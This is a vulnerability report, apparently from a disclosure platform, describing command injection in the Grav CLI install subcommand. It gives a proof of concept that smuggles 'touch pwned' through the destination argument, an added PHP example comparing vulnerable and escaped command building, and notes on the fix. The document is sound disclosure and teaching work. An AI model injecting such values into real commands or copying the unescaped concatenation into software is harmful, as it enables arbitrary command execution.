Local Command Injection Post-Installation of Dependencies in getgrav/grav
May 27th 2022
grav version <= 1.7.33 is vulnerable to OS command injection. The install subcommand of the grav CLI installs the dependencies Grav needs, and accepts only its first argument as the destination directory into which the predetermined plugin/theme repositories are cloned. That argument is concatenated into the shell command without any validation and passed directly to the exec method.
Proof of Concept
$ export DEST='x";touch pwned #"'
$ mkdir "$DEST" # to pass dependencies check
$ cp .dependencies .htaccess "$DEST" # to pass dependencies check
$ ./bin/grav install "$DEST"
# ...SNIPPED...
# Cloning Bits
# ============
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-problems -> x";touch pwned #"/user/plugins/problems
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-error -> x";touch pwned #"/user/plugins/error
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-markdown-notices -> x";touch pwned #"/user/plugins/markdown-notices
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-theme-quark -> x";touch pwned #"/user/themes/quark
#
$ find . -name "pwned"
./pwned
The file was created in the current working directory, confirming that the injected command ran.
This issue leads to arbitrary command execution.
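The following PHP is an added illustration of the pattern described above and is not Grav's own code or the fix in commit de4af5: a command builder that splices the destination into a shell string verbatim, beside a hardened builder that validates its inputs and passes each value through escapeshellarg(). The function names, the $subdir parameter and the URL allow-list are assumptions made for this example.

```php
<?php
// Added example (not Grav's code). Both functions only build a command string;
// nothing here is executed, so the output can be inspected safely.

// Vulnerable pattern: $dest is user-controlled and is concatenated into the
// command unescaped. A value containing a double quote ends the quoted argument,
// and a following ';' lets the shell run whatever comes next as a new command.
function cloneIntoVulnerable(string $repo, string $dest, string $subdir): string
{
    return 'cd "' . $dest . '" && git clone ' . $repo . ' ' . $subdir;
}

// Hardened pattern: check that the destination is an existing directory, keep
// the repository and subdirectory to the forms the installer expects, and wrap
// every interpolated value in escapeshellarg() so the shell sees exactly one
// argument per value regardless of quotes or metacharacters it contains.
function cloneIntoHardened(string $repo, string $dest, string $subdir): string
{
    $real = realpath($dest);
    if ($real === false || !is_dir($real)) {
        throw new InvalidArgumentException('destination is not an existing directory');
    }
    // Assumed policy for this example: only GitHub HTTPS repositories.
    if (!preg_match('#^https://github\.com/[\w.-]+/[\w.-]+$#', $repo)) {
        throw new InvalidArgumentException('unexpected repository URL');
    }
    if (!preg_match('#^[\w./-]+$#', $subdir) || strpos($subdir, '..') !== false) {
        throw new InvalidArgumentException('unexpected subdirectory');
    }
    return 'cd ' . escapeshellarg($real)
        . ' && git clone ' . escapeshellarg($repo) . ' ' . escapeshellarg($subdir);
}

// Demonstration with the destination value from the report above.
$repo    = 'https://github.com/getgrav/grav-plugin-problems';
$subdir  = 'user/plugins/problems';
$hostile = 'x";touch pwned #"';

// Unescaped: the double quote in $hostile closes the cd argument early.
echo cloneIntoVulnerable($repo, $hostile, $subdir), PHP_EOL;

// Hardened: a non-existent directory is rejected before any command is built.
try {
    cloneIntoHardened($repo, $hostile, $subdir);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// Hardened, existing directory: even a name with quotes and metacharacters
// stays a single, fully quoted argument.
$dir = sys_get_temp_dir() . '/grav-demo-x";touch pwned #"';
if (!is_dir($dir)) {
    mkdir($dir);
}
echo cloneIntoHardened($repo, $dir, $subdir), PHP_EOL;
rmdir($dir);
```

The directory check alone would not have stopped the report's PoC, which creates the destination first to pass the dependencies check; the protection that matters is that each value reaches the shell as one escaped argument. On PHP 7.4 and later, passing an array of arguments to proc_open() avoids invoking a shell at all and removes the quoting question entirely, which is the preferable design where the installer can be restructured that way.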
commented a year ago
I cannot see how this is a security issue rather than a bug. Nevertheless, it's fixed now.
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Matias Griese validated this vulnerability a year ago
Dwi Siswanto has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Matias Griese marked this as fixed in 1.7.34 with commit de4af5 a year ago
This vulnerability will not receive a CVE